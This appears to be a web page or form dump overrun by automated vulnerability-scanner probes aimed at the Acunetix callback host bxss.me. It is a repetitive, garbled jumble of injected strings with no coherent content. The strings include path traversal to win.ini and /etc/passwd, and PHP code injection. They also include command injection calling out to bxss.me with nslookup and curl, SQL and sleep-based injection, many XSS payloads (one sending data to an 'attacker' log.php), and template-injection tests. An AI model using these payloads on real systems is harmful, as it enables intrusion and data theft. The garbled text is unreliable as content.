.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
'&&sleep(27*1000)*jrrqdo&&'
Http://bxss.me/t/fit.txt
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
${@print(md5(31337))}
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
-1 OR 2+210-210-1=0+0+0+1 --
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
'"()
";print(md5(31337));$a="
'+response.write(9817628*9295121)+'
response.write(9817628*9295121)
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
';print(md5(31337));$a='
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
;(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)|(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)&(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)
<esi:include src="http://bxss.me/rpb.png"/>
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
`(nslookup -q=cname hitkawnnbpifx1b7b4.bxss.me||curl hitkawnnbpifx1b7b4.bxss.me)`
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
${10000293+9999661}
|(nslookup -q=cname hitaecygdqrda6d518.bxss.me||curl hitaecygdqrda6d518.bxss.me)
..\..\..\..\..\..\..\..\windows\win.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&'\"`0&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&`'
<esi:include src="http://bxss.me/rpb.png"/>
&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&'\"`0&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&`'
/../../../../../../../../../../boot.ini
TYstbF4f
../../../../../../../../../../windows/win.ini%00.jpg
$(nslookup -q=cname hitravdnnljju945dd.bxss.me||curl hitravdnnljju945dd.bxss.me)
C:\WINDOWS\system32\drivers\etc\hosts
(nslookup -q=cname hitvmqtpytjts5fbcf.bxss.me||curl hitvmqtpytjts5fbcf.bxss.me))
/../../../../../../../../../../windows/system32/BITSADMIN.exe
file:///etc/passwd
../../../../../../../../../../../../../../windows/win.ini
|echo yzwxfb$()\ vygwfz\nz^xyu||a #' |echo yzwxfb$()\ vygwfz\nz^xyu||a #|" |echo yzwxfb$()\ vygwfz\nz^xyu||a #
&echo wvwcwk$()\ ikhxzx\nz^xyu||a #' &echo wvwcwk$()\ ikhxzx\nz^xyu||a #|" &echo wvwcwk$()\ ikhxzx\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
^(#$!@#$)(()))******
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo gneiij$()\ fgqwej\nz^xyu||a #' &echo gneiij$()\ fgqwej\nz^xyu||a #|" &echo gneiij$()\ fgqwej\nz^xyu||a #
!(()&&!|*|*|
&n938393=v944240
74jeWA3T
".gethostbyname(lc("hitrj"."azyqnxki4adc1.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(82).chr(103).chr(84)."
)
'.gethostbyname(lc('hitem'.'gltyxfchb2ce8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(112).chr(70).'
&n962114=v990802
'.print(md5(31337)).'
${@print(md5(31337))}\
"||sleep(27*1000)*tlewzv||"
${@print(md5(31337))}
1LtFPHyxO
";print(md5(31337));$a="
'||sleep(27*1000)*ctiydw||'
"&&sleep(27*1000)*clmwmb&&"
';print(md5(31337));$a='
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
^(#$!@#$)(()))******
".gethostbyname(lc("hitef"."gzkxetcd4264c.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(73).chr(101).chr(84)."
'&&sleep(27*1000)*rddjeq&&'
'.gethostbyname(lc('hitzh'.'vdtnyges59c7c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(87).chr(99).chr(73).'
!(()&&!|*|*|
'"()
1Scm6lveO
bxss.me
![1](/content1/20/bxss%2Eme)
555
c:/windows/win.ini
![1](/content1/20/bxss%2Eme)
555
/etc/shells
![1](/content1/20/bxss%2Eme)
555
Http://bxss.me/t/fit.txt
![1](/content1/20/bxss%2Eme)
555
http://bxss.me/t/fit.txt%3F.
![1](/content1/20/bxss%2Eme)
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.
![1](/content1/20/bxss%2Eme)
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
bxss.me
Mr.
![1](/content1/20/bxss%2Eme)
c:/windows/win.ini
Mr.
![1](/content1/20/bxss%2Eme)
/etc/shells
Mr.
![1](/content1/20/bxss%2Eme)
http://bxss.me/t/fit.txt%3F.jpg
Mr.
![1](/content1/20/bxss%2Eme)
Http://bxss.me/t/fit.txt
Mr.
![1](/content1/20/bxss%2Eme)
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
Mr.
![1](/content1/20/bxss%2Eme)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(113).concat(88)+(require'socket'
555
Mr.
![1](/content1/20/bxss%2Eme)
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(118).concat(82)+(require"socket"
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/bxss.me/bxss%2Eme)
555
Mr.
555
Mr.
'+'A'.concat(70-3).concat(22*4).concat(118).concat(83).concat(102).concat(83)+(require'socket'
Mr.
![1](/content1//etc/shells/bxss%2Eme)
555
Mr.
"+"A".concat(70-3).concat(22*4).concat(102).concat(83).concat(101).concat(90)+(require"socket"
Mr.
![1](/content1/1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
Mr.
555
Mr.
555
Mr.
![1](/contentbxss.me/20/bxss%2Eme)
555
./Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content/etc/shells/20/bxss%2Eme)
555
Mr.
![1](/content/etc/shells/20/bxss%2Eme)
555
Mr.
555
../Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg/20/bxss%2Eme)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/bxss%2Eme)
555
file:///etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
555
../../../../../../../../../../../../../../windows/win.ini
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/ZZZTest413%2Ejpg)
555
../../../../../../../../../../../../../../etc/passwd
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/ZZZTestEXIF4143%2Ejpg)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
'.print(md5(31337)).'
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
${@print(md5(31337))}\
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
${@print(md5(31337))}
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
./555
Mr.
![1](/content1/20/web%2Exml)
../555
";print(md5(31337));$a="
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
file:///etc/passwd
';print(md5(31337));$a='
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../windows/win.ini
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
../../../../../../../../../../../../../../etc/passwd
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
'.print(md5(31337)).'
Mr.
![1](/content1/./20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}\
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
${@print(md5(31337))}
Mr.
![1](/content1/../20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
";print(md5(31337));$a="
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
';print(md5(31337));$a='
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
';print(md5(31337));$a='
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/../../../../../../../../../../../../../../windows/win.ini/web%2Exml)
555
Mr.
![1](/content1/../../../../../../../../../../../../../../etc/passwd/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content./1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/'.print(md5(31337)).'/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/${@print(md5(31337))}\/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content../../../../../../../../../../../../../../windows/win.ini/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/${@print(md5(31337))}/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/${@print(md5(31337))}/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/';print(md5(31337));$a='/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content../../../../../../../../../../../../../../etc/passwd/20/web%2Exml)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
555
Mr.
![1](/content1/;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/web%2Exml)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
".gethostbyname(lc("hitvj"."hxnlnpzw62092.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(81).chr(107).chr(87)."
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content'.print(md5(31337)).'/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'
555
'.gethostbyname(lc('hitkr'.'texwiahub64ba.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(77).chr(98).chr(68).'
555
Mr.
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content${@print(md5(31337))}\/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
![1](/content1/20/%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255c%2E%2E%255cwindows%255cwin%2Eini)
555
Mr.
555
Mr.
![1](/content${@print(md5(31337))}/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content${@print(md5(31337))}/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
".gethostbyname(lc("hitpl"."mdziqwop564ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(78).chr(115).chr(80)."
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'
Mr.
'.gethostbyname(lc('hityl'.'hxqqslny165ff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(116).chr(65).'
Mr.
![1](/content';print(md5(31337));$a='/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
![1](/content;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
Mr.
![1](/content1/20/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows%25c0%25afwin%2Eini)
555
Mr.
![1](/content1/20/boot%2Eini)
555
Mr.
![1](/content1/20/%27%2Eprint%28md5%2831337%29%29%2E%27)
555
Mr.
555
Mr.
555
Mr.
555
Mr.
![1](/content1/20/win%2Eini)
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
555
Mr.
![1](/content1/20/%27%2Egethostbyname%28lc%28%27hitpe%27%2E%27gqjvkiuva02b9%2Ebxss%2Eme%2E%27%29%29%2E%27A%27%2Echr%2867%29%2Echr%28hex%28%2758%27%29%29%2Echr%28107%29%2Echr%2865%29%2Echr%28109%29%2Echr%2865%29%2E%27)
555
Mr.<aVaCJHC x=9579>
1
Mr.<ifRAme sRc=9121.com></IfRamE>
1
Mr.<WF9P3B>ISNEZ[!+!]</WF9P3B>
1
Mr.s1cgt
1
Mr.}body{zzz:Expre/**/SSion(glOn(9825))}
1
<a HrEF=jaVaScRiPT:>
1
Mr.
1
<a HrEF=http://xss.bxss.me></a>
1
Mr.<input autofocus onfocus=glOn(9919)>
1
�<img zzz onmouseover=glOn(99571) //�>
1
Mr.<ScRiPt>glOn(9292)</sCripT>
1
Mr.\u003CScRiPt\glOn(9818)\u003C/sCripT\u003E
1
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%67%6C%4F%6E%289456%29%3C%2F%73%43%72%69%70%54%3E
1
Mr.<img/src=">" onerror=alert(9331)>
1
Mr.<img src=xyz OnErRor=glOn(9350)>
1
Mr.<img src=//xss.bxss.me/t/dot.gif onload=glOn(9631)>
1
Mr.
1
Mr.<body onload=glOn(9207)>
1
Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9060'>
1
Mr.<isindex type=image src=1 onerror=glOn(9492)>
1
Mr.<svg
1
Mr.<InvalidTag
1
Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9840></ScRiPt>
1
Mr.<InvalidTag
1
Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%6C%4F%6E%28%39%31%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
Mr.<InvalidTag>glOn(9612)</script>
1
Mr.
1
Mr.<WO3NRD>PLZEA[!+!]</WO3NRD>
1
Mr.<InvalidTag >glOn(9438)</ScRiPt>
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
dfb__${98991*97996}__::.x
1
dfb[[${98991*97996}]]xca
1
dfb{{98991*97996}}xca
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
<%={{={@{#{${dfb}}%>
1
\<\%\=\{\{\=\{\@\{\#\{\$\{dfb\}\}\%\>
1
<%={{={@{#{${dfb}}%>
1
bfgx8048%C0%BEz1%C0%BCz2a%90bcxhjl8048
1
bfg5734%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5734
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
dfb__${98991*97996}__::.x
1
Mr.
1
dfb[[${98991*97996}]]xca
1
dfb{{98991*97996}}xca
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
Mr.
1
<%={{={@{#{${dfb}}%>
1
bfgx2856%C0%BEz1%C0%BCz2a%90bcxhjl2856
1
bfg3343%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3343
1
Mr.9388217
1
Mr.
19745687
Mr.
1
'"()&%<zzz><InvalidTag >glOn(9769)</ScRiPt>
1
Mr.
1
Mr.
'"()&%<zzz><InvalidTag >EscH(9412)</ScRiPt>
Mr.
1
Mr.
1
Mr.
'"()&%<zzz><InvalidTag >IFPP(9333)</ScRiPt>
Mr.'"()&%<zzz><InvalidTag >glOn(9193)</ScRiPt>
1
Mr.'"()&%<zzz><InvalidTag >glOn(9193)</ScRiPt>
1
Mr.
1'"()&%<zzz><InvalidTag >EscH(9633)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.<a85Kx9a<
1
Mr.<img sRc='http://attacker-9856/log.php?
1
Mr.<atDaD2y x=9854>
1
Mr.<ifRAme sRc=9762.com></IfRamE>
1
Mr.
1
Mr.<WVJ9EO>7MIG2[!+!]</WVJ9EO>
1
Mr.<WVJ9EO>7MIG2[!+!]</WVJ9EO>
1
Mr.kaojw
1
Mr.}body{zzz:Expre/**/SSion(CBel(9171))}
1
<a HrEF=jaVaScRiPT:>
1
<a HrEF=http://xss.bxss.me></a>
1
Mr.<input autofocus onfocus=CBel(9521)>
1
�<img zzz onmouseover=CBel(97641) //�>
1
Mr.<ScRiPt>CBel(9628)</sCripT>
1
Mr.
1
Mr.\u003CScRiPt\CBel(9850)\u003C/sCripT\u003E
1
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%43%42%65%6C%289498%29%3C%2F%73%43%72%69%70%54%3E
1
Mr.<img/src=">" onerror=alert(9717)>
1
Mr.<img src=xyz OnErRor=CBel(9843)>
1
Mr.<img src=//xss.bxss.me/t/dot.gif onload=CBel(9781)>
1
Mr.<body onload=CBel(9271)>
1
Mr.
1
Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9422'>
1
Mr.<isindex type=image src=1 onerror=CBel(9965)>
1
Mr.<svg
1
Mr.<InvalidTag
1
Mr.<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9581></ScRiPt>
1
Mr.
1
Mr.<InvalidTag
1
Mr.
1
Mr.%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%43%42%65%6C%28%39%31%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
Mr.
1
Mr.<InvalidTag>CBel(9428)</script>
1
Mr.
1
Mr.<WAMKBN>MEESI[!+!]</WAMKBN>
1
Mr.
1
Mr.<InvalidTag >CBel(9311)</ScRiPt>
1
Mr.
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
Mr.
1
dfb__${98991*97996}__::.x
1
Mr.
1
Mr.
1
dfb[[${98991*97996}]]xca
1
Mr.
1
dfb{{98991*97996}}xca
1
Mr.
1
Mr.
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%69%55%6B%45%28%39%34%35%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
<%={{={@{#{${dfb}}%>
1
Mr.
1
bfgx9432%C0%BEz1%C0%BCz2a%90bcxhjl9432
1
Mr.
1
bfg10980%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl10980
1
Mr.
1
Mr.
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
Mr.
1
Mr.
1
dfb__${98991*97996}__::.x
1
Mr.
1
Mr.
1
Mr.
1
Mr.
dfb{{98991*97996}}xca
Mr.
1
dfb[[${98991*97996}]]xca
1
Mr.
1
dfb{{98991*97996}}xca
1
Mr.
1
Mr.
1
Mr.
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
<th:t="${dfb}#foreach
1
<th:t="${dfb}#foreach
1
Mr.
1
Mr.
1
<%={{={@{#{${dfb}}%>
1
Mr.
1
bfgx3906%C0%BEz1%C0%BCz2a%90bcxhjl3906
1
bfgx3906%C0%BEz1%C0%BCz2a%90bcxhjl3906
1
bfg7402%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl7402
1
Mr.
1
Mr.
1
Mr.9716525
1
Mr.
19784415
Mr.
1
Mr.
1
Mr.
'"()&%<zzz><InvalidTag >btTd(9046)</ScRiPt>
'"()&%<zzz><InvalidTag >CBel(9433)</ScRiPt>
1
Mr.
1
Mr.'"()&%<zzz><InvalidTag >CBel(9782)</ScRiPt>
1
Mr.'"()&%<zzz><InvalidTag >CBel(9782)</ScRiPt>
1
Mr.
1'"()&%<zzz><InvalidTag >btTd(9554)</ScRiPt>
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.
1
Mr.<a9w7SZN<
1
Mr.<img sRc='http://attacker-9429/log.php?
1
Mr.<aqKxcRW x=9166>
1
Mr.<ifRAme sRc=9601.com></IfRamE>
1
Mr.<WUFZBR>ORLDH[!+!]</WUFZBR>
1
Mr.HqAkt
1
Mr.}body{zzz:Expre/**/SSion(1MHx(9741))}
1
<a HrEF=jaVaScRiPT:>
1
<a HrEF=http://xss.bxss.me></a>
1
Mr.<input autofocus onfocus=1MHx(9880)>
1
�<img zzz onmouseover=1MHx(96561) //�>
1
Mr.<ScRiPt>1MHx(9665)</sCripT>
1
Mr.\u003CScRiPt\1MHx(9874)\u003C/sCripT\u003E
1
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%31%4D%48%78%289289%29%3C%2F%73%43%72%69%70%54%3E
1
Mr.<img/src=">" onerror=alert(9112)>
1
Mr.<img src=xyz OnErRor=1MHx(9546)>
1
Mr.<img src=//xss.bxss.me/t/dot.gif onload=1MHx(9227)>
1
Mr.
1
Mr.<body onload=1MHx(9661)>
1
Mr.
1
Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9437'>
1
Mr.<isindex type=image src=1 onerror=1MHx(9059)>
1
